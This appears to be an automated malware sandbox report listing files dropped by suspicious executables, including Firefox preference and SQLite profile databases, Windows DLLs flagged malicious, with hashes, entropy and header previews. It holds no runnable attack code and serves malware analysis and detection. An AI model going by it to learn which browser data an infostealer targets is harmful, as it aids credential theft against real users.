                                                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1734018583);..user_pref("app.up
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                                        Entropy (8bit):1.1211596417522893
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                                                                                                                                                                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                                                                                                                                                                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                                                                                                                                                                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                                                                                                                                                                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                                                                        Entropy (8bit):1.1368932887859682
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                                                                                                                                                                                                                                                        MD5:9A534FD57BED1D3E9815232E05CCF696
                                                                                                                                                                                                                                                                                        SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                                                                                                                                                                                                                                                        SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                                                                                                                                                                                                                                                        SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):3293
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3364558769830905
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc5q35VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                                                                                        MD5:4ED743F7E1676539C322DAB36E328377
                                                                                                                                                                                                                                                                                        SHA1:AAD5F8C6DF7C8CEC18522B9E572721A71F5182F3
                                                                                                                                                                                                                                                                                        SHA-256:EBEEE88F4A11C2DB02A1AC83F7CF00BEADB70CF23670DA29487B6543A1EDCB00
                                                                                                                                                                                                                                                                                        SHA-512:024E50C28044329DCEB38B02C7874F7FDB43FB84156E5C32ED8966F0682FFBA48A159D2DE96ADE52C33B5D3364612A9D1E16714B00944C18CD82D60F4479CADF
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1018
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.235990633565231
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24:YqHZ6T06Mhmpvmyb0O0bihmAvmy6CUXyhmDvmybxdB6hmKvmyz0JahmlvmybNdBd:YqHZ6T06McEyb0O0biczyDUXycaybxdp
                                                                                                                                                                                                                                                                                        MD5:0D158326133D9F27F44A933593B668BB
                                                                                                                                                                                                                                                                                        SHA1:634FB34DC528526CA14417C73DBC57C6A1155D28
                                                                                                                                                                                                                                                                                        SHA-256:F0C4D41D7073B5255B4F85056C20C29F4435D540A0C9D6D9EED8B38F6508D9FC
                                                                                                                                                                                                                                                                                        SHA-512:D108588E8D57AC94B4763A8C07C25E62F11CB089084791E5DF7C0621E3229E0637B9BBCE1AC26583889230B2517125CAC680CFD688BEFF5159C88771A9F89024
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":1015884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":1005884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":995884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":985884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":975884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":965884592,"LastSwitchedHighPart":31061873,"Pre
                                                                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):111792
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.024807308753198
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:768:m2Vq97kIG3aXkvt/jk0Y+hgqkmONRLADmjCP8MPKQfR1vcMaEhymIyps33nbh0ip:skcXkrhrkmJOh0ibG1nNEFS9KL40
                                                                                                                                                                                                                                                                                        MD5:CFFB6A6AF2569C5A0972846785D11A1C
                                                                                                                                                                                                                                                                                        SHA1:A597410A686A77574962E46F47A438D9AF898D5A
                                                                                                                                                                                                                                                                                        SHA-256:A0435AA22D8ECCE362807D9FBEDE774D60805E4CA94D56028409247629EE9E26
                                                                                                                                                                                                                                                                                        SHA-512:4BD42894790D69018172577DCC6867329F2FA731B1DB3060BFF739B4240B809ABDEB809BBEE1177F2C82D8211ED50DAAF15C12F435CE0F6EC17D4CFA1B6816C3
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:....h... ...............P...............^.......c................... ...\.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k..
                                                                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):110968
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.027048723741959
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:768:9OVHSkkG8kCurrjk0c4JohF4NCL0+J7j037uPwJpR1v9jLu/3mh2ypj3wAhKiUGX:9Pk+pGJohFr+NhKiUGynnWFtKAj
                                                                                                                                                                                                                                                                                        MD5:B22125BCC13A61DBA047BCDFB9E0BAB3
                                                                                                                                                                                                                                                                                        SHA1:94731C627E2C935B0E46D30A69CB44B3569ECD0C
                                                                                                                                                                                                                                                                                        SHA-256:392F6244B17270999FAD9598398C68D84EEAF03E6C9A81511DBB6C8EE968D029
                                                                                                                                                                                                                                                                                        SHA-512:796604DD11536A06AA609787F70EDDC537A11B0DB2CB6513E67006DFE3C66CD32CDD29B981B00C767D33FB90DF6762C7595D4F44C702ABC64BEE7B85FE338727
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:....h... ...x..........P..............^...X...c...........X..........\.......e.n.-.C.H.;.e.n.-.G.B.............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k..
                                                                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):109928
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.046016344827016
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:768:WeaV0eAdkHGGCX39jk0Q7GigowNZL4soljQPZXPvrI4R1vcLBYLmemIyph3zyFlx:We3kxCiGigoQvvzhAigGQnTuF6KfG2jR
                                                                                                                                                                                                                                                                                        MD5:F38A190B0898361ABE5DEFDBEBC78B7B
                                                                                                                                                                                                                                                                                        SHA1:9D2D69C35694B2FB646467CB9B14730C67856BDD
                                                                                                                                                                                                                                                                                        SHA-256:FC49164F5ED2C55A339D03CE38FED2CB5711DF89AC053C99DE070168C563013F
                                                                                                                                                                                                                                                                                        SHA-512:F187183139C755BEBB980A17D4B4318D9295F53AC92D1B16D816F3A62F08B723E52C05E0C959875DDE3442557311784DBFA13655C841006D53D29E1444C1C217
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:....h... ...h..........P.............._...P...d...........P..........\.......e.n.-.C.H.;.e.n.-.G.B.............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k..
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):242176
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.47050397947197
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                                                                                                                                                                                                                                                        MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                                                                                                                                                                                                                                                        SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                                                                                                                                                                                                                                                        SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
